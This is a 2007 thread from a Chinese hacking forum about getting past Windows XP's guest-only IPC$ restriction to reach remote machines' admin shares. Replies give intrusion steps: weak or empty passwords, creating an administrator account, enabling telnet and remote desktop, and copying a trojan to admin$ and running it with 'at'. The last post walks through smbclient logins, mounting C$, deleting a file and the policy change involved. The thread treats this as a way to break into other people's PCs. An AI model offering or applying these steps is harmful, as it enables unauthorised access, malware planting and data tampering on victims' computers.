[讨论]一个令人无法理解的ipc$连接的新鲜问题(页 1) - 技术讨论{ Technique Discussions } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

kuangjuan 2007-7-25 00:05

[讨论]一个令人无法理解的ipc$连接的新鲜问题

文章作者：kuangjuan
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

C:\>net use \\192.168.1.101\ipc$ ""/user:administrator
命令成功完成。

C:\>net use z: \\192.168.1.101\c$
密码在 \\192.168.1.101\c$ 无效。

要连接 MICROSOF-65D882\Guest 到 192.168.1.101，按 ENTER，或输入一个新的用户名:
输入 'MICROSOF-65D882\Guest' 的密码来连接到 '192.168.1.101':
发生系统错误 5。

拒绝访问。

我查了好多资料可还是没找到相关的解决方法，请大家帮帮忙。。。。谢谢了。。

ntandtv 2007-7-26 08:20

C:\>net use \\192.168.1.101\ipc$ ""/user:administrator
命令成功完成。如果条件允许的话,直接用recton连接好了,不要搞这么麻烦,如果真想知道原因,建议去学习编程,不然一辈子都不能理解

kuangjuan 2007-7-26 20:31

我有学过c，要想更好的话，不知道还要学哪一类的编程。。。。不然麻木性太大，请指教。。谢谢

darkblue 2007-7-28 13:20

难道设置了只能登陆来宾

沉渊 2007-7-29 19:33

如果对方是xp系统的话，是指允许GUEST用户连接共享的

pop3067 2007-7-30 11:59

不能使用空密码连接ipc？

天影 2007-7-31 00:57

IPC$个人认为现在的利用价值已经不高了,虽然现在好多基础教程都提到IPC$.

现在基本都用XP系统,IPC$在xp系统下的权限是很低的,就算你知道对方的管理员帐号密码

也没有利用价值.

楼主,如果对方真的是XP系统,建议你放弃 IPC$

kylinfoxy 2007-8-4 13:34

对方如果是XP系统
其通过IPC访问只可以使用Guest用户
可以拷虑使用提权Guest用户后，再进行连接就可以了

sunwear 2007-8-4 14:44

[quote]引用第7楼kylinfoxy于2007-08-04 13:34发表的 :
对方如果是XP系统
其通过IPC访问只可以使用Guest用户
可以拷虑使用提权Guest用户后，再进行连接就可以了[/quote]

只能建立IPC连接的情况下，你有什么办法把GUEST提升到管理员？
XP系统ipc 使用"" administrator 是guest用户？？？？？
[s:264][s:264][s:264]

kuangjuan 2007-8-5 13:50

net user guset /add
net localgroup administrators guset /add
用这个就能创建一个guset 用户，并把他的权限提高到管理员

wasyou 2007-8-6 00:34

在xp 下的ipc$ 不管什么权限的用户都只有 guest的权限

liu830219 2007-8-7 16:53

ipc$ xp直接放弃,2000和2003还能用用.

lucifel 2007-8-24 11:31

提议：既然它的是弱口令，用啊D开了它的TELNET，建立新用户，提升权限，开共享，种植马儿，搞定！（只是提议）

deadshadow 2007-8-25 16:27

[quote]引用第5楼pop3067于2007-07-30 11:59发表的 :
不能使用空密码连接ipc？[/quote]

ipc可以用空密码来连

deadshadow 2007-8-25 16:30

[quote]引用第9楼kuangjuan于2007-08-05 13:50发表的 :
net user guset /add
net localgroup administrators guset /add
用这个就能创建一个guset 用户，并把他的权限提高到管理员[/quote]

这个还要看他的管理员组有没有改掉

kuangjuan 2007-8-27 21:31

这个漏洞只有在windows2000中才行的通。。Windows XP安装后的默认共享方式就是"仅来宾"的方式。在xp中任何远程的用户只能有guest的权限，无法得到管理员权限。。当然就无法映射了。。

icexiaoye 2007-8-28 00:18

[quote]引用第1楼ntandtv于2007-07-26 08:20发表的 :
C:>net use \192.168.1.101ipc$ ""/user:administrator
命令成功完成。如果条件允许的话,直接用recton连接好了,不要搞这么麻烦,如果真想知道原因,建议去学习编程,不然一辈子都不能理解[/quote]

牛人
请问这和编程有什么关系
请教下

evilcwa 2007-8-28 01:46

看了二楼和三楼的对白。。 [s:289]

楼主的问题难道是因为administrator权限被阎了？成了受限组滴啦？
牛人出来解答下啦啦

hitlerboy 2007-8-28 08:29

[quote]引用第6楼天影于2007-07-31 00:57发表的 :
IPC$个人认为现在的利用价值已经不高了,虽然现在好多基础教程都提到IPC$.

现在基本都用XP系统,IPC$在xp系统下的权限是很低的,就算你知道对方的管理员帐号密码

也没有利用价值.
.......[/quote]
本来6楼老大说的没错，但是现在不是很多的diy机器都是装的番茄的系统么，或者是东海的ghost版本。
这两个版本，被动了手脚，所以，如果遇到管理员帐号，弱口令，空口令，在这两种操作系统下，是可以利用的，而且很爽内。

kuangjuan 2007-8-28 23:41

adminstrator 没有被阎，只是在xp系统中，进行ipc链接，只能获得guest 权限，并不能将它上升的adminstrator，当然就无法进行管理员操作了。。。

mmovve 2007-10-26 17:09

[size=1][/size][s:267]用啊D可以轻松解决的，强烈建议

peerless 2007-11-5 20:36

ipc$可以空连接，但是没有什么用
你有弱口令就可以开telnet，然后用telnet再开3389

zsza 2007-11-6 21:08

我空链接了，但是要建立非空连接就不行了，郁闷死了，谁知道是怎么回事啊。老是提示说“只能登录一个帐号”

bachelor 2007-11-7 00:25

为什么的IPC连接成功开不了对方的telnet?

hitlerboy 2007-11-7 01:51

ipc$连接了怎么就能telnet了。。。
网上很早的，用ipc$的经典的教程有分析整个过程。
要到telnet需要很多步。。。

heekey 2007-11-7 16:13

现在XP系统的IPC$连接一般都不可以了啊！好像在2000和2003上还可以！如果要真的入侵个人电脑的话还是从一些软件漏洞开始好像还可以

guduao1122 2007-11-13 16:09

[quote]引用第23楼zsza于2007-11-06 21:08发表的 :
我空链接了，但是要建立非空连接就不行了，郁闷死了，谁知道是怎么回事啊。老是提示说“只能登录一个帐号”[/quote]

出现这个问题需要删除已经建立好的空连接：net use \\ip\ipc$ /del
然后net use一下看看还有没有会话。
没有的话就可以用帐号进行ipc连接了

guduao1122 2007-11-13 16:14

其实有了ipc管理员连接，可以直接使用“计算机管理”连接远程计算机，想开什么服务开什么服务
想隐蔽一点的就在cmd用copy命令好了：copy 木马.exe \\ip\admin$，然后at执行就好了

舍我其谁 2007-11-13 17:23

[quote]引用第12楼lucifel于2007-08-24 11:31发表的 :
提议：既然它的是弱口令，用啊D开了它的TELNET，建立新用户，提升权限，开共享，种植马儿，搞定！（只是提议）[/quote]
那也得分什么系统哦，现在小型服务器一般是2003(服务器好像不是你用IPC就能搞的主）,个人一般是XP，你啊D开谁的TELNET哇

lovepzz 2007-11-15 15:33

在我的电脑计算机管理选连接到另外一台计算机.连上后开启对方telnet服务
在telnet进入开启amdin$及C$ d$....然后net use z:\\....就可以映射成功! [s:264]

老流氓 2007-11-16 22:41

看只有sunwear弟弟一个EST高官出马就知道问题现在没什么价值了。其它的兄弟和我同级[b]新手上路[/b],我来日他一下。[s:264]
[b]wasyou[/b]兄弟说的最终听了。 [b]在xp 下的ipc$ 不管什么权限的用户都只有 guest的权限[/b] 最佳答案，管理员加分先。19楼的那位兄台，2003是不能用滴，其实那不要什么漏洞，JB WIN很多服务器要用到IPC的。我测试了一下，大家一LOOK就明白怎么回事了。

重要提示：[b]正常情况，XP想用IPC那是做梦！[/b] 其实XP啊，和2K在IPC这东西只差了一点点，像楼上所说的，连接上去只是来宾权限，这是可以改的。比如有个XP机器有eviloctal管理员，密码同名。
[color=#ff0000]#smbclient //10.0.0.1/ -U eviloctal%eviloctal[/color]  默认情况
[b]session setup failed: NT_STATUS_LOGON_FAILURE[/b]
  那怕你输入正确的用户名及密码也看不到里边的东东，但在XP机器上改一小下就OK了，改那里，麻烦你向后看。[b] [/b]

[color=#ff0000]#smbclient -L //10.0.0.1/ -U eviloctal%eviloctal[/color] 非默认情况
[b]Domain=[CISCO] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager][/b]

[b] Sharename Type Comment[/b]
[b] --------- ---- -------[/b]
[b] E$    Disk 默认共享[/b]
[b] IPC$    IPC 远程 IPC[/b]
[b] D$    Disk 默认共享[/b]
[b] G$    Disk 默认共享[/b]
[b] F$    Disk 默认共享[/b]
[b] ADMIN$    Disk 远程管理[/b]
[b] C$    Disk 默认共享[/b]
[b]session request to 10.0.0.1 failed (Called name not present)[/b]
[b]session request to 10 failed (Called name not present)[/b]
[b]Domain=[CISCO] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager][/b]

[b] Server       Comment[/b]
[b] ---------    -------[/b]

[b] Workgroup    Master[/b]
[b] ---------    -------[/b]

看到了什么？出来了吧，同样也可以登录到服务器上去。LOOK……

[color=#ff0000]#smbclient //10.0.0.1/c$ -U eviloctal%eviloctal[/color]
[b]Domain=[CISCO] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager][/b]
[b]smb: \>[/b][color=#ff0000] cd windows\system32[/color]
[b]smb: \windows\system32\> [/b][color=#ff0000]pwd[/color]
[b]Current directory is \\10.0.0.1\c$\windows\system32\[/b]
[b]smb: \windows\system32\> [/b][color=#ff0000]ls *.ini[/color]
[b] BsMain.ini          A 160 Thu Nov 15 13:09:05 2007[/b]
[b] desktop.ini          A 2 Tue Aug 17 20:00:00 2004[/b]
[b] esentprf.ini          A 1015477 Tue Aug 17 20:00:00 2004[/b]
[b] [/b][b]40036 blocks of size 131072. 5388 blocks available[/b]
[b]……
smb: \windows\system32\> [/b][color=#ff0000]quit[/color]

  不要认为他是WIN2000噢，同样也可以挂载net use z: \\ip\c$……

[color=#ff0000]# smbmount //10.0.0.1/c$ /mnt -o username=eviloctal%eviloctal[/color]
[color=#ff0000]# ls -l /mnt/[/color]
[b]total 1573559[/b]
[b]-rwxr-xr-x  1 root root    0 Sep 16 18:00 AUTOEXEC.BAT[/b]
[b]-r-xr-xr-x  1 root root 322730 Aug 17 2004 bootfont.bin[/b]
[b]-r-xr-xr-x  1 root root    211 Nov 5 18:20 boot.ini[/b]
[b]-rwxr-xr-x  1 root root 27456 Nov 16 2007 bsmain_runtime.log[/b]
[b]-rwxr-xr-x  1 root root 21183 Nov 16 2007 cmd.txt[/b]
[b]drwxr-xr-x  1 root root    4096 Oct 10 21:14 Config.Msi[/b]
[b]-rwxr-xr-x  1 root root    0 Sep 16 18:00 CONFIG.SYS[/b]
[b]drwxr-xr-x  1 root root    4096 Sep 16 18:06 Documents and Settings[/b]
[b]-r-xr-xr-x  1 root root    0 Sep 16 18:00 IO.SYS[/b]
[b]-r-xr-xr-x  1 root root    0 Sep 16 18:00 MSDOS.SYS[/b]
[b]-r-xr-xr-x  1 root root 47564 Aug 17 2004 NTDETECT.COM[/b]
[b]-r-xr-xr-x  1 root root 257200 Aug 17 2004 ntldr[/b]
[b]-rwxr-xr-x  1 root root 1610612736 Nov 16 2007 pagefile.sys[/b]
[b]dr-xr-xr-x  1 root root    4096 Oct 19 19:08 Program Files[/b]
[b]dr-xr-xr-x  1 root root    4096 Nov 14 12:01 RavBin[/b]
[b]drwxr-xr-x  1 root root    4096 Sep 17 12:42 RECYCLER[/b]
[b]-rwxr-xr-x  1 root root    4 Nov 16 2007 response.txt[/b]
[b]drwxr-xr-x  1 root root    4096 Sep 17 22:35 System Volume Information[/b]
[b]drwxr-xr-x  1 root root    4096 Sep 18 00:47 TDDOWNLOAD[/b]
[b]drwxr-xr-x  1 root root    4096 Nov 14 14:28 WINDOWS[/b]
[color=#ff0000]# ls -l /mnt/windows/*.log[/color]
[b]-rwxr-xr-x  1 root root    0 Nov 16 2007 /mnt/windows/0.log[/b]
[b]-rwxr-xr-x  1 root root    2057 Nov 14 14:25 /mnt/windows/comsetup.log[/b]
[b]-rwxr-xr-x  1 root root    6183 Nov 14 14:25 /mnt/windows/FaxSetup.log[/b]
[b]-rwxr-xr-x  1 root root 11160 Nov 15 22:05 /mnt/windows/WindowsUpdate.log[/b]
[b]-rwxr-xr-x  1 root root    2480 Nov 12 22:20 /mnt/windows/wmsetup.log[/b]
[b]……[/b]
[color=#ff0000]# rm /mnt/windows/0.log[/color] 同样也可有管理员权限！
[b]rm: remove regular empty file `/mnt/windows/0.log'?[/b][color=#ff0000] y[/color]

改动了一点点，XP就和2000“一样了”。开始-程序-运行-gpedit.msc-计算机设置-windows设置-本地策略-安全选项-网络访问：本地账户的共享和安全模式，从默认改成另一项就OK了，注册表，可以用快照工具找出来，同样要有管理员权限！

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[讨论]一个令人无法理解的ipc$连接的新鲜问题